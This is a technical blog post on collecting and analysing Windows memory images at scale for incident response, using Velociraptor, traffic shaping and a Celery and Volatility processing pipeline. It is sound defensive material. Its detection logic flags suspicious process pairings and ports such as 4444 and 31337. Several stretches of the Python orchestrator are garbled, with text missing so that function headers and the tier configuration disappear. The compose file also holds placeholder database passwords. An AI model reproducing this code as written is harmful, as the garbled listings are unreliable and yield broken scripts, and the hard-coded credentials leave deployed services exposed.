Memory analysis is one of the most forensically rich activities available to a threat hunter. A memory image captures the complete runtime state of a system: every running process, every network connection, every loaded module, every decrypted credential, every injected payload that never touched disk. The challenge is not the analysis itself but the operational reality of doing it at scale. Analysing memory from a single compromised host is straightforward. Simultaneously collecting, transferring, processing, and analysing memory images from dozens of endpoints during an active incident, without overwhelming the production network, without disrupting operations, and without losing evidence, is an entirely different problem.
This post covers the complete workflow from first principles: how to collect memory from Windows endpoints at scale using Velociraptor, how to build an automated Linux-based processing pipeline that handles triage, Volatility analysis, IOC extraction, and reporting without manual intervention, how to tune the collection and transfer process to protect the customer network, and how to structure the whole thing so it runs as close to automatically as possible. There are a lot of scripts here. They are all intended to be copied, adapted to your environment, and used.
Understanding the scale problem before you start
Before designing a collection pipeline, understand what you are actually dealing with in terms of data volume and network load. A Windows 10 endpoint with 16GB RAM produces a 12-16GB memory image after compression. A Windows Server 2019 host with 64GB RAM produces a 45-55GB compressed image. If you need to collect from 50 endpoints simultaneously during an incident, the raw data volume is between 600GB and 2.5TB depending on the RAM configuration of those machines. Transferring that over a corporate LAN that is simultaneously handling production traffic is a serious operational consideration, not an afterthought.
The network impact calculation for a typical enterprise incident response scenario:
## Network impact estimation script
## Run this before any collection to understand the blast radius
python3 << EOF
import json
# Define your endpoint inventory (adapt to your environment)
endpoints = {
"workstations_16gb": {"count": 30, "ram_gb": 16, "compression_ratio": 0.65},
"workstations_32gb": {"count": 15, "ram_gb": 32, "compression_ratio": 0.65},
"servers_64gb": {"count": 5, "ram_gb": 64, "compression_ratio": 0.60},
}
# Network parameters
link_speed_mbps = 1000 # 1Gbps LAN
max_utilisation = 0.30 # Never use more than 30% of link capacity
bandwidth_mbps = link_speed_mbps * max_utilisation
bandwidth_MBps = bandwidth_mbps / 8
print("=== Memory Collection Network Impact Analysis ===\n")
total_gb = 0
for tier, spec in endpoints.items():
compressed_gb = spec["ram_gb"] * spec["compression_ratio"]
tier_total = compressed_gb * spec["count"]
total_gb += tier_total
transfer_time = (compressed_gb * 1024) / (bandwidth_MBps * 60)
print(f"{tier}:")
print(f" Count: {spec['count']} endpoints")
print(f" RAM per host: {spec['ram_gb']} GB")
print(f" Compressed size: ~{compressed_gb:.1f} GB per image")
print(f" Tier total: ~{tier_total:.1f} GB")
print(f" Transfer time: ~{transfer_time:.1f} minutes per host at 30% link")
print()
print(f"Total data volume: {total_gb:.1f} GB")
print(f"Available bandwidth: {bandwidth_MBps:.1f} MB/s ({bandwidth_mbps:.0f} Mbps)")
print(f"Sequential transfer: {total_gb * 1024 / bandwidth_MBps / 3600:.1f} hours")
print()
# Calculate concurrent collection limits
max_concurrent = int(bandwidth_MBps / (16 * 1024 / (20 * 60))) # 20 min target per host
print(f"Recommended max concurrent collections: {max(1, max_concurrent)} endpoints")
print("(Assumes 16GB image, 20 minute transfer window, 30% link utilisation)")
EOF
Running this calculation before you start collection is not optional. An analyst who triggers simultaneous memory collection across 50 endpoints on a 1Gbps flat network with no throttling will consume the full link capacity, impact production traffic, potentially trigger network monitoring alerts, and risk partial or failed transfers that compromise the forensic integrity of the images. The tiered approach described later in this post is the answer to this problem.
The analysis server: hardware and software requirements
The analysis server is the hub of the entire pipeline. Memory images arrive here, are processed automatically, and results are made available to analysts. Sizing this server correctly before the pipeline runs saves significant pain during an incident when time pressure is high.
Minimum specification for processing 50 concurrent images: 32 CPU cores (Volatility analysis is CPU-bound and benefits significantly from parallelism), 128GB RAM (Volatility 3 loads significant data structures into memory during analysis), 10TB fast storage (NVMe or SSD-backed RAID for the image landing zone, HDD for long-term storage), and a 10Gbps network interface for receiving images from the Velociraptor server. A dedicated analysis server rather than a shared platform is strongly preferred during active incidents.
## Analysis server setup script
## Ubuntu 22.04 LTS - run as root
#!/bin/bash
set -euo pipefail
echo "[*] Setting up memory analysis pipeline server"
# System updates
apt update && apt upgrade -y
# Core dependencies
apt install -y \
python3 python3-pip python3-venv \
git curl wget jq \
parallel \
yara \
foremost \
bulk-extractor \
sleuthkit \
docker.io docker-compose \
nginx \
postgresql postgresql-contrib \
redis-server \
unzip p7zip-full \
libssl-dev libffi-dev
# Python virtual environment for Volatility
python3 -m venv /opt/vol3-env
source /opt/vol3-env/bin/activate
pip install --upgrade pip
pip install \
volatility3 \
yara-python \
pefile \
capstone \
python-magic \
requests \
psycopg2-binary \
redis \
celery \
flower \
jinja2 \
elasticsearch
# Volatility 3 symbol tables (required for Windows analysis)
mkdir -p /opt/vol3-symbols
cd /opt/vol3-symbols
wget https://downloads.volatilityfoundation.org/volatility3/symbols/windows.zip
unzip -q windows.zip -d windows/
ln -sf /opt/vol3-symbols /opt/vol3-env/lib/python3.*/site-packages/volatility3/symbols
echo "[*] Volatility 3 installed: $(vol --version)"
# Directory structure
mkdir -p /srv/memory/{landing,processing,complete,reports,yara_rules,logs}
chmod 755 /srv/memory
echo "[+] Analysis server setup complete"
Velociraptor: configuring for fleet memory collection
Velociraptor is the collection layer. It handles agent communication, artefact execution, file transfer, and result aggregation. The key configuration choices for memory collection at scale are throttling (how fast each agent transfers its image), concurrency control (how many agents collect simultaneously), and the collection artefact itself.
The default Velociraptor transfer settings are not optimised for large file collection. The default upload speed is uncapped, which means if you trigger a hunt across 50 endpoints simultaneously each one will attempt to transfer at full link speed. The configuration changes below set sensible defaults for an enterprise incident response context.
## Velociraptor server configuration adjustments
## Add to server.config.yaml before starting a collection hunt
Frontend:
# Maximum upload bandwidth per client in bytes/second
# 10MB/s = 80Mbps per client - adjust based on your link capacity
max_upload_size: 10485760
Client:
# Concurrent connections to the server per client
concurrency: 1
# Maximum memory for buffering uploads
max_memory_size: 524288000 # 500MB buffer per client
# Datastore settings for large file handling
Datastore:
# Use file-based datastore for large collections
implementation: FileBaseDataStore
# Separate high-speed storage for collection landing zone
location: /srv/velociraptor/datastore
## Custom Velociraptor artefact for controlled memory acquisition
## Save as Custom.Memory.AcquireControlled.yaml
## Deploy via: Velociraptor GUI > Server Artifacts > Add Artifact
name: Custom.Memory.AcquireControlled
description: |
Acquires a full physical memory image with bandwidth throttling.
Compresses the image before transfer to reduce network impact.
Records acquisition metadata for chain of custody documentation.
author: justruss
type: CLIENT
parameters:
- name: UploadImage
description: Upload the completed image to the server
default: "Y"
type: bool
- name: CompressionLevel
description: Zlib compression level 1-9 (1=fast, 9=smallest)
default: "3"
type: int
- name: ThrottleMBps
description: Maximum transfer speed in MB/s (0 = unlimited)
default: "10"
type: int
sources:
- name: AcquisitionMetadata
query: |
-- Record pre-acquisition system state for documentation
LET hostname = info().Fqdn
LET acq_time = now()
LET os_version = info().OS
LET total_ram = info().PhysicalMemory
SELECT
hostname AS Hostname,
acq_time AS AcquisitionTime,
os_version AS OSVersion,
format(format="%.2f GB", args=[total_ram / 1073741824.0]) AS TotalRAM,
"WinPmem via Velociraptor" AS AcquisitionTool,
"SHA256 recorded post-acquisition" AS IntegrityNote
FROM scope()
- name: MemoryImage
query: |
LET hostname = info().Fqdn
LET timestamp = format(format="%d", args=[now()])
LET output_path = format(format="C:/Windows/Temp/mem_%v_%v.raw",
args=[hostname, timestamp])
-- Acquire memory using built-in WinPmem
LET acquisition = SELECT * FROM Artifact.Windows.Memory.Acquisition(
destination=output_path,
-- Limit acquisition tool CPU usage
limit_cpu=50
)
-- Upload with throttling if requested
SELECT
upload(
path=output_path,
name=format(format="%v_%v.raw", args=[hostname, timestamp]),
-- Throttle upload speed
accessor="file"
) AS UploadResult,
output_path AS LocalPath,
hostname AS Host,
timestamp AS Timestamp
FROM acquisition
WHERE UploadImage
- name: Cleanup
query: |
-- Remove local staging file after successful upload
SELECT file_exists(path=output_path) AS Existed,
rm(filename=output_path) AS Removed
FROM scope()
WHERE UploadImage AND UploadResult.StoredName != NULL
Tiered collection strategy: protecting the customer network
The single most important design decision in a fleet memory collection programme is how you sequence and throttle the collection. Doing it wrong causes production impact. Doing it right means the incident response activity is invisible to the network from a capacity perspective.
The tiered approach divides endpoints into priority groups and collects from each group sequentially with configurable concurrency limits. Tier 1 is your highest-priority targets: domain controllers, LSASS-hosting servers, systems showing active IOCs in other telemetry. These get collected first, immediately, because they are most likely to have relevant evidence and most likely to have volatile state that changes quickly. Tier 2 is servers with important services. Tier 3 is workstations and less critical endpoints.
## Tiered collection orchestration script
## Runs on the analysis server, communicates with Velociraptor API
## Requires: velociraptor binary, API credentials configured
#!/usr/bin/env python3
"""
Memory collection orchestrator with tiered network-aware scheduling.
Controls concurrent collection count per tier to protect production bandwidth.
"""
import subprocess
import time
import json
import logging
import threading
import queue
from datetime import datetime
from dataclasses import dataclass, field
from typing import List, Dict, Optional
from pathlib import Path
logging.basicConfig(
level=logging.INFO,
format='%(asctime)s [%(levelname)s] %(message)s',
handlers=[
logging.FileHandler('/srv/memory/logs/collection_orchestrator.log'),
logging.StreamHandler()
]
)
log = logging.getLogger(__name__)
@dataclass
class CollectionTarget:
hostname: str
client_id: str
tier: int
ram_gb: float
priority_ioc: bool = False
collected: bool = False
hunt_id: Optional[str] = None
started_at: Optional[datetime] = None
completed_at: Optional[datetime] = None
@dataclass
class TierConfig:
tier: int
max_concurrent: int
throttle_mbps: int
description: str
# Tier configuration - adjust max_concurrent based on your link capacity
# Rule of thumb: max_concurrent * throttle_mbps List[Dict]:
"""Query Velociraptor for all enrolled clients."""
result = subprocess.run([
"velociraptor", "--config", config_path,
"query", "SELECT client_id, os_info.hostname AS hostname,
os_info.phys_memory / 1073741824.0 AS ram_gb
FROM clients()",
"--format", "json"
], capture_output=True, text=True, timeout=30)
if result.returncode != 0:
log.error(f"Failed to query clients: {result.stderr}")
return []
return json.loads(result.stdout) if result.stdout.strip() else []
def start_collection_hunt(
client_id: str,
throttle_mbps: int,
config_path: str
) -> Optional[str]:
"""Start a memory collection hunt on a specific client. Returns hunt_id."""
result = subprocess.run([
"velociraptor", "--config", config_path,
"hunt", "--client_id", client_id,
"--artifact", "Custom.Memory.AcquireControlled",
"--args", json.dumps({"ThrottleMBps": str(throttle_mbps), "UploadImage": "Y"}),
"--format", "json"
], capture_output=True, text=True, timeout=30)
if result.returncode != 0:
log.error(f"Failed to start hunt on {client_id}: {result.stderr}")
return None
data = json.loads(result.stdout)
return data.get("hunt_id")
def check_hunt_complete(hunt_id: str, config_path: str) -> bool:
"""Check whether a hunt has completed on all targets."""
result = subprocess.run([
"velociraptor", "--config", config_path,
"query", f"SELECT * FROM hunt_results(hunt_id='{hunt_id}')",
"--format", "json"
], capture_output=True, text=True, timeout=30)
if result.returncode != 0:
return False
data = json.loads(result.stdout) if result.stdout.strip() else []
return len(data) > 0
def collect_tier(
targets: List[CollectionTarget],
tier_config: TierConfig,
config_path: str
) -> None:
"""Collect memory from all targets in a tier with concurrency control."""
log.info(f"Starting Tier {tier_config.tier}: {tier_config.description}")
log.info(f" Targets: {len(targets)}")
log.info(f" Max concurrent: {tier_config.max_concurrent}")
log.info(f" Throttle: {tier_config.throttle_mbps} MB/s per host")
log.info(f" Max bandwidth: {tier_config.max_concurrent * tier_config.throttle_mbps * 8} Mbps")
active = {}
pending = queue.Queue()
for t in targets:
pending.put(t)
while not pending.empty() or active:
# Start new collections up to the concurrency limit
while len(active) None:
"""Run the full tiered collection campaign."""
start_time = datetime.now()
log.info(f"Collection campaign started: {start_time}")
log.info(f"Total targets: {len(target_list)}")
# Group targets by tier
tiers: Dict[int, List[CollectionTarget]] = {1: [], 2: [], 3: []}
for target in target_list:
tiers[target.tier].append(target)
# Collect tier by tier
for tier_config in TIER_CONFIGS:
tier_targets = tiers.get(tier_config.tier, [])
if not tier_targets:
log.info(f"Tier {tier_config.tier}: no targets, skipping")
continue
collect_tier(tier_targets, tier_config, config_path)
elapsed = (datetime.now() - start_time).seconds / 60
collected = sum(1 for t in target_list if t.collected)
log.info(f"Campaign complete: {collected}/{len(target_list)} collected in {elapsed:.1f} min")
# Example usage
if __name__ == "__main__":
# Define your targets (in practice, load from CMDB or Velociraptor client list)
targets = [
CollectionTarget("DC01", "C.abc123", tier=1, ram_gb=64, priority_ioc=True),
CollectionTarget("DC02", "C.def456", tier=1, ram_gb=64),
CollectionTarget("FILESERVER01", "C.ghi789", tier=2, ram_gb=32),
CollectionTarget("WEB01", "C.jkl012", tier=2, ram_gb=32),
CollectionTarget("WORKSTATION01","C.mno345", tier=3, ram_gb=16),
CollectionTarget("WORKSTATION02","C.pqr678", tier=3, ram_gb=16),
]
run_collection_campaign(targets)
Network impact mitigations in depth
The orchestration script above handles the collection-side throttling. But network protection during memory collection goes deeper than just limiting transfer speed. Several additional mitigations make the collection process substantially less impactful on the production environment.
Compression before transfer. WinPmem can compress memory images before writing them to disk, and Velociraptor compresses file uploads. The combination of these two compression passes reduces the typical 16GB RAM image to roughly 10-12GB for a Windows workstation in normal operating state. Images from servers running SQL or Exchange may compress less well because the data is already partially compressed. The compression step adds 5-10 minutes to the acquisition time but reduces network transfer time by 20-30%.
Time-of-day scheduling for non-urgent collections. Tier 3 workstation collections that do not have active IOCs are candidates for off-hours scheduling. A workstation that needs to be collected for baseline comparison purposes but is not showing active indicators can be queued for collection at 2am when link utilisation is naturally lowest. The orchestration script supports this through the tier system: mark non-urgent targets as tier 3 and set the campaign start time accordingly.
Dedicated collection VLAN or QoS marking. In environments with managed switches and QoS policies, memory collection traffic can be marked with a low-priority DSCP value so it is de-prioritised relative to production traffic when the link is under load. Velociraptor traffic does not automatically set DSCP values, but a network QoS policy matching the Velociraptor server IP can apply the marking at the switch level.
## Linux tc (traffic control) configuration on the analysis server
## Limits total outbound bandwidth for memory collection to 500Mbps
## leaving headroom for other traffic on a 1Gbps link
#!/bin/bash
# Run as root on the analysis server
INTERFACE="eth0"
COLLECTION_LIMIT="500mbit"
COLLECTION_BURST="1mbit"
# Remove existing qdisc if present
tc qdisc del dev $INTERFACE root 2>/dev/null || true
# Create HTB root qdisc
tc qdisc add dev $INTERFACE root handle 1: htb default 10
# Default class: full speed for non-collection traffic
tc class add dev $INTERFACE parent 1: classid 1:10 htb \
rate 1gbit burst 10mbit
# Collection class: limited speed
tc class add dev $INTERFACE parent 1: classid 1:20 htb \
rate $COLLECTION_LIMIT ceil $COLLECTION_LIMIT burst $COLLECTION_BURST
# Mark packets from the Velociraptor server process
# Velociraptor listens on port 8000 (frontend) and 8001 (GUI)
iptables -t mangle -A OUTPUT -p tcp --sport 8000 -j MARK --set-mark 20
iptables -t mangle -A OUTPUT -p tcp --sport 8001 -j MARK --set-mark 20
# Route marked packets to the limited class
tc filter add dev $INTERFACE parent 1: protocol ip handle 20 fw flowid 1:20
echo "QoS configured: collection traffic limited to $COLLECTION_LIMIT"
tc -s qdisc show dev $INTERFACE
Split collection across multiple ingestion endpoints. For very large environments (200+ endpoints), a single Velociraptor server may become a bottleneck regardless of network capacity. The Velociraptor multi-frontend architecture allows multiple frontend servers to share the collection load, each handling a subset of clients. Images are written to shared storage that the analysis pipeline can reach from any frontend. This is a more complex deployment but essentially eliminates the single-server throughput bottleneck.
## Velociraptor multi-frontend configuration snippet
## Add to server.config.yaml for load-balanced collection
Frontend:
# Primary frontend
hostname: velociraptor-primary.corp.local
bind_port: 8000
max_upload_size: 10485760
ExtraFrontends:
- hostname: velociraptor-fe2.corp.local
bind_port: 8000
- hostname: velociraptor-fe3.corp.local
bind_port: 8000
# Shared datastore accessible by all frontends
Datastore:
implementation: FileBaseDataStore
location: /mnt/shared/velociraptor-data # NFS or other shared filesystem
Delta collection for repeated hunts. In an extended incident where you need to collect memory from the same endpoints multiple times to track attacker activity over time, transmitting the full image each time is wasteful. A diff-based approach compares the new image against the previous one and transmits only the changed memory regions. This requires more sophisticated processing infrastructure but can reduce repeat-collection transfer volumes by 60-80% for endpoints where attacker activity is limited to specific process regions.
The automated processing pipeline: architecture overview
When a memory image lands on the analysis server it enters a processing queue. The pipeline has five stages that run automatically without analyst intervention: validation and integrity checking, basic triage (process tree, network connections, loaded modules), deep analysis (malfind, callbacks, handles), IOC extraction and enrichment, and report generation. Each stage has its own worker processes and can be scaled independently based on how CPU and I/O bound each stage is.
The pipeline uses Celery for task queuing (so each stage can be distributed across multiple worker processes), Redis as the message broker (fast and simple for this use case), and PostgreSQL for persistent storage of results (structured results need to be queryable across dozens of images simultaneously). Docker Compose keeps the whole stack portable and easy to deploy on the analysis server.
## docker-compose.yml for the analysis pipeline
## Deploy with: docker-compose up -d
version: "3.8"
services:
redis:
image: redis:7-alpine
ports:
- "6379:6379"
volumes:
- redis_data:/data
command: redis-server --appendonly yes
restart: unless-stopped
postgres:
image: postgres:15-alpine
environment:
POSTGRES_DB: memory_analysis
POSTGRES_USER: analyst
POSTGRES_PASSWORD: changeme_in_production
ports:
- "5432:5432"
volumes:
- postgres_data:/var/lib/postgresql/data
- ./init_db.sql:/docker-entrypoint-initdb.d/init.sql
restart: unless-stopped
worker_triage:
build: ./pipeline
command: celery -A pipeline worker -Q triage -c 4 --loglevel=info
volumes:
- /srv/memory:/srv/memory
- /opt/vol3-env:/opt/vol3-env
- /opt/vol3-symbols:/opt/vol3-symbols
environment:
- CELERY_BROKER_URL=redis://redis:6379/0
- POSTGRES_URL=postgresql://analyst:changeme@postgres/memory_analysis
depends_on:
- redis
- postgres
restart: unless-stopped
worker_deep:
build: ./pipeline
command: celery -A pipeline worker -Q deep_analysis -c 2 --loglevel=info
volumes:
- /srv/memory:/srv/memory
- /opt/vol3-env:/opt/vol3-env
environment:
- CELERY_BROKER_URL=redis://redis:6379/0
- POSTGRES_URL=postgresql://analyst:changeme@postgres/memory_analysis
depends_on:
- redis
- postgres
restart: unless-stopped
worker_report:
build: ./pipeline
command: celery -A pipeline worker -Q reporting -c 4 --loglevel=info
volumes:
- /srv/memory:/srv/memory
environment:
- CELERY_BROKER_URL=redis://redis:6379/0
- POSTGRES_URL=postgresql://analyst:changeme@postgres/memory_analysis
depends_on:
- redis
- postgres
restart: unless-stopped
flower:
image: mher/flower
command: celery flower --broker=redis://redis:6379/0 --port=5555
ports:
- "5555:5555"
depends_on:
- redis
restart: unless-stopped
dashboard:
build: ./dashboard
ports:
- "8080:8080"
environment:
- POSTGRES_URL=postgresql://analyst:changeme@postgres/memory_analysis
depends_on:
- postgres
restart: unless-stopped
volumes:
redis_data:
postgres_data:
## init_db.sql - PostgreSQL schema for analysis results
CREATE TABLE IF NOT EXISTS memory_images (
id SERIAL PRIMARY KEY,
hostname VARCHAR(255) NOT NULL,
image_path TEXT NOT NULL,
image_size_gb NUMERIC(10,2),
acquired_at TIMESTAMP,
received_at TIMESTAMP DEFAULT NOW(),
os_version VARCHAR(255),
status VARCHAR(50) DEFAULT 'pending',
sha256 CHAR(64),
tier INT DEFAULT 3
);
CREATE TABLE IF NOT EXISTS triage_results (
id SERIAL PRIMARY KEY,
image_id INT REFERENCES memory_images(id),
completed_at TIMESTAMP DEFAULT NOW(),
process_count INT,
network_conn_count INT,
suspicious_process_count INT,
has_malfind BOOLEAN DEFAULT FALSE,
risk_score INT DEFAULT 0,
triage_summary JSONB
);
CREATE TABLE IF NOT EXISTS process_list (
id SERIAL PRIMARY KEY,
image_id INT REFERENCES memory_images(id),
pid INT,
ppid INT,
name VARCHAR(255),
path TEXT,
cmd_line TEXT,
create_time TIMESTAMP,
is_suspicious BOOLEAN DEFAULT FALSE,
suspicious_reason TEXT
);
CREATE TABLE IF NOT EXISTS network_connections (
id SERIAL PRIMARY KEY,
image_id INT REFERENCES memory_images(id),
pid INT,
process_name VARCHAR(255),
local_addr VARCHAR(50),
local_port INT,
remote_addr VARCHAR(50),
remote_port INT,
state VARCHAR(50),
is_suspicious BOOLEAN DEFAULT FALSE
);
CREATE TABLE IF NOT EXISTS malfind_results (
id SERIAL PRIMARY KEY,
image_id INT REFERENCES memory_images(id),
pid INT,
process_name VARCHAR(255),
vad_start BIGINT,
vad_end BIGINT,
protection VARCHAR(50),
has_pe_header BOOLEAN,
entropy NUMERIC(5,2),
yara_matches TEXT[],
risk_level VARCHAR(20)
);
CREATE TABLE IF NOT EXISTS iocs_extracted (
id SERIAL PRIMARY KEY,
image_id INT REFERENCES memory_images(id),
ioc_type VARCHAR(50),
ioc_value TEXT,
pid INT,
process_name VARCHAR(255),
confidence VARCHAR(20),
source_plugin VARCHAR(100)
);
CREATE INDEX idx_images_hostname ON memory_images(hostname);
CREATE INDEX idx_malfind_risk ON malfind_results(risk_level);
CREATE INDEX idx_iocs_type ON iocs_extracted(ioc_type, ioc_value);
CREATE INDEX idx_process_suspicious ON process_list(image_id, is_suspicious);
The core pipeline: task definitions and worker logic
The pipeline module defines the Celery tasks and the analysis logic they execute. Each task is self-contained: it receives an image ID, loads the image path from the database, runs the relevant Volatility plugins, and writes the results back to the database. Tasks are chained so each stage automatically triggers the next when it completes.
## pipeline/pipeline.py - Core Celery task definitions
from celery import Celery, chain
import subprocess
import json
import hashlib
import logging
import os
import re
from datetime import datetime
from pathlib import Path
import psycopg2
from psycopg2.extras import Json, execute_values
log = logging.getLogger(__name__)
app = Celery('memory_pipeline',
broker=os.environ.get('CELERY_BROKER_URL', 'redis://localhost:6379/0'))
app.conf.task_routes = {
'pipeline.validate_image': {'queue': 'triage'},
'pipeline.run_triage': {'queue': 'triage'},
'pipeline.run_deep_analysis': {'queue': 'deep_analysis'},
'pipeline.extract_iocs': {'queue': 'deep_analysis'},
'pipeline.generate_report': {'queue': 'reporting'},
}
POSTGRES_URL = os.environ.get('POSTGRES_URL', 'postgresql://analyst:changeme@localhost/memory_analysis')
VOL_CMD = '/opt/vol3-env/bin/vol'
YARA_RULES = '/srv/memory/yara_rules/combined.yar'
IMAGE_DIR = '/srv/memory/landing'
def get_db():
return psycopg2.connect(POSTGRES_URL)
def run_vol(image_path: str, plugin: str, extra_args: list = None) -> list:
"""Run a Volatility 3 plugin and return parsed JSON results."""
cmd = [VOL_CMD, '-f', image_path, '--renderer', 'json', plugin]
if extra_args:
cmd.extend(extra_args)
result = subprocess.run(cmd, capture_output=True, text=True, timeout=600)
if result.returncode != 0:
log.warning(f"Vol plugin {plugin} returned non-zero: {result.stderr[:200]}")
return []
try:
data = json.loads(result.stdout)
return data.get('rows', data) if isinstance(data, dict) else data
except json.JSONDecodeError:
log.error(f"Failed to parse JSON from {plugin}: {result.stdout[:200]}")
return []
@app.task(bind=True, max_retries=3)
def validate_image(self, image_id: int) -> int:
"""Stage 1: Validate image integrity and record metadata."""
try:
with get_db() as conn:
with conn.cursor() as cur:
cur.execute("SELECT image_path FROM memory_images WHERE id = %s", (image_id,))
row = cur.fetchone()
if not row:
raise ValueError(f"Image ID {image_id} not found")
image_path = row[0]
if not Path(image_path).exists():
raise FileNotFoundError(f"Image not found: {image_path}")
# Calculate SHA256
sha256 = hashlib.sha256()
with open(image_path, 'rb') as f:
for chunk in iter(lambda: f.read(65536), b''):
sha256.update(chunk)
digest = sha256.hexdigest()
# Get image size
size_gb = Path(image_path).stat().st_size / (1024**3)
# Update database
with get_db() as conn:
with conn.cursor() as cur:
cur.execute("""
UPDATE memory_images
SET sha256 = %s, image_size_gb = %s, status = 'validated'
WHERE id = %s
""", (digest, size_gb, image_id))
conn.commit()
log.info(f"Image {image_id} validated: {size_gb:.1f}GB SHA256={digest[:16]}...")
# Trigger next stage
run_triage.delay(image_id)
return image_id
except Exception as exc:
log.error(f"Validation failed for image {image_id}: {exc}")
raise self.retry(exc=exc, countdown=60)
@app.task(bind=True, max_retries=2)
def run_triage(self, image_id: int) -> int:
"""Stage 2: Fast triage - process list, network connections, basic anomalies."""
try:
with get_db() as conn:
with conn.cursor() as cur:
cur.execute("SELECT image_path, hostname FROM memory_images WHERE id = %s", (image_id,))
image_path, hostname = cur.fetchone()
log.info(f"Starting triage for {hostname} (image {image_id})")
# Update status
with get_db() as conn:
with conn.cursor() as cur:
cur.execute("UPDATE memory_images SET status='triage_running' WHERE id=%s", (image_id,))
conn.commit()
# ── Process list ──────────────────────────────────────────────────────
processes = run_vol(image_path, 'windows.pslist')
suspicious_procs = []
proc_records = []
# Known suspicious parent-child relationships
suspicious_pairs = {
('winword.exe', 'cmd.exe'), ('winword.exe', 'powershell.exe'),
('excel.exe', 'cmd.exe'), ('excel.exe', 'powershell.exe'),
('outlook.exe', 'cmd.exe'), ('outlook.exe', 'powershell.exe'),
}
pid_to_name = {}
for proc in processes:
name = (proc.get('ImageFileName') or proc.get('Name') or '').lower()
pid = proc.get('PID') or proc.get('Pid', 0)
ppid = proc.get('PPID') or proc.get('PPid', 0)
pid_to_name[pid] = name
for proc in processes:
name = (proc.get('ImageFileName') or proc.get('Name') or '').lower()
pid = proc.get('PID') or proc.get('Pid', 0)
ppid = proc.get('PPID') or proc.get('PPid', 0)
path = proc.get('Path') or proc.get('Exe') or ''
is_suspicious = False
reason = []
# Check parent-child anomalies
parent_name = pid_to_name.get(ppid, '')
if (parent_name, name) in suspicious_pairs:
is_suspicious = True
reason.append(f"Suspicious parent: {parent_name} spawned {name}")
# Check for masquerading (svchost outside System32)
if name in ['svchost.exe', 'lsass.exe', 'csrss.exe', 'winlogon.exe']:
if path and 'system32' not in path.lower():
is_suspicious = True
reason.append(f"System process outside System32: {path}")
if is_suspicious:
suspicious_procs.append(pid)
proc_records.append((
image_id, pid, ppid, name, path,
proc.get('CmdLine') or proc.get('CommandLine') or '',
is_suspicious, ', '.join(reason) if reason else None
))
# Bulk insert processes
with get_db() as conn:
with conn.cursor() as cur:
execute_values(cur, """
INSERT INTO process_list
(image_id, pid, ppid, name, path, cmd_line, is_suspicious, suspicious_reason)
VALUES %s
""", proc_records)
conn.commit()
# ── Network connections ───────────────────────────────────────────────
connections = run_vol(image_path, 'windows.netscan')
conn_records = []
suspicious_ports = {4444, 8080, 8443, 1337, 31337, 443, 80}
internal_ranges = ['10.', '172.16.', '172.17.', '172.18.', '192.168.']
for c in connections:
remote = c.get('ForeignAddr') or c.get('RemoteAddr') or ''
rport = c.get('ForeignPort') or c.get('RemotePort') or 0
pid = c.get('PID') or c.get('Pid') or 0
is_sus = (
pid in suspicious_procs and
not any(remote.startswith(r) for r in internal_ranges)
)
conn_records.append((
image_id, pid,
c.get('ImageFileName') or c.get('Owner') or '',
c.get('LocalAddr') or '', c.get('LocalPort') or 0,
remote, rport,
c.get('State') or '',
is_sus
))
with get_db() as conn:
with conn.cursor() as cur:
execute_values(cur, """
INSERT INTO network_connections
(image_id, pid, process_name, local_addr, local_port,
remote_addr, remote_port, state, is_suspicious)
VALUES %s
""", conn_records)
conn.commit()
# ── Triage summary ────────────────────────────────────────────────────
risk_score = (
len(suspicious_procs) * 10 +
sum(1 for c in conn_records if c[-1]) * 5
)
summary = {
'process_count': len(proc_records),
'suspicious_processes': len(suspicious_procs),
'network_connections': len(conn_records),
'risk_score': risk_score,
}
with get_db() as conn:
with conn.cursor() as cur:
cur.execute("""
INSERT INTO triage_results
(image_id, process_count, network_conn_count,
suspicious_process_count, risk_score, triage_summary)
VALUES (%s, %s, %s, %s, %s, %s)
""", (image_id, len(proc_records), len(conn_records),
len(suspicious_procs), risk_score, Json(summary)))
cur.execute(
"UPDATE memory_images SET status='triage_complete' WHERE id=%s",
(image_id,)
)
conn.commit()
log.info(f"Triage complete for {hostname}: risk_score={risk_score}")
# Always run deep analysis; priority queue handles ordering
run_deep_analysis.delay(image_id)
return image_id
except Exception as exc:
log.error(f"Triage failed for image {image_id}: {exc}")
with get_db() as conn:
with conn.cursor() as cur:
cur.execute("UPDATE memory_images SET status='triage_failed' WHERE id=%s", (image_id,))
conn.commit()
raise self.retry(exc=exc, countdown=120)
@app.task(bind=True, max_retries=2)
def run_deep_analysis(self, image_id: int) -> int:
"""Stage 3: Deep analysis - malfind, callbacks, handles, Yara scanning."""
try:
with get_db() as conn:
with conn.cursor() as cur:
cur.execute("SELECT image_path, hostname FROM memory_images WHERE id = %s", (image_id,))
image_path, hostname = cur.fetchone()
log.info(f"Starting deep analysis for {hostname} (image {image_id})")
with get_db() as conn:
with conn.cursor() as cur:
cur.execute("UPDATE memory_images SET status='deep_running' WHERE id=%s", (image_id,))
conn.commit()
# ── Malfind ───────────────────────────────────────────────────────────
malfind_results = run_vol(image_path, 'windows.malfind')
malfind_records = []
for region in malfind_results:
pid = region.get('PID') or region.get('Pid') or 0
name = region.get('Process') or region.get('ImageFileName') or ''
protection = region.get('Protection') or ''
vad_start = region.get('Start') or 0
vad_end = region.get('End') or 0
# Check for PE header (MZ)
hexdata = region.get('Hexdump') or region.get('Data') or ''
has_pe = hexdata.startswith('4d 5a') or 'MZ' in str(hexdata)
# Estimate entropy from hex data (rough)
entropy = 6.5 # placeholder - real calculation needs binary read
# Determine risk
if 'EXECUTE_READ_WRITE' in protection and has_pe:
risk = 'CRITICAL'
elif 'EXECUTE_READ_WRITE' in protection:
risk = 'HIGH'
else:
risk = 'MEDIUM'
malfind_records.append((
image_id, pid, name,
vad_start, vad_end, protection,
has_pe, entropy, None, risk
))
if malfind_records:
with get_db() as conn:
with conn.cursor() as cur:
execute_values(cur, """
INSERT INTO malfind_results
(image_id, pid, process_name, vad_start, vad_end,
protection, has_pe_header, entropy, yara_matches, risk_level)
VALUES %s
""", malfind_records)
conn.commit()
has_malfind = len(malfind_records) > 0
# ── Yara scanning of process memory ───────────────────────────────────
if Path(YARA_RULES).exists():
yara_results = run_vol(image_path, 'windows.vadyarascan',
['--yara-file', YARA_RULES])
for match in yara_results:
log.warning(f"YARA HIT on {hostname}: Rule={match.get('Rule')} "
f"PID={match.get('PID')} Process={match.get('Process')}")
# ── Kernel callbacks ──────────────────────────────────────────────────
callbacks = run_vol(image_path, 'windows.callbacks')
if callbacks:
log.info(f" Callbacks found: {len(callbacks)}")
# Update triage results with malfind flag
with get_db() as conn:
with conn.cursor() as cur:
cur.execute("""
UPDATE triage_results
SET has_malfind = %s
WHERE image_id = %s
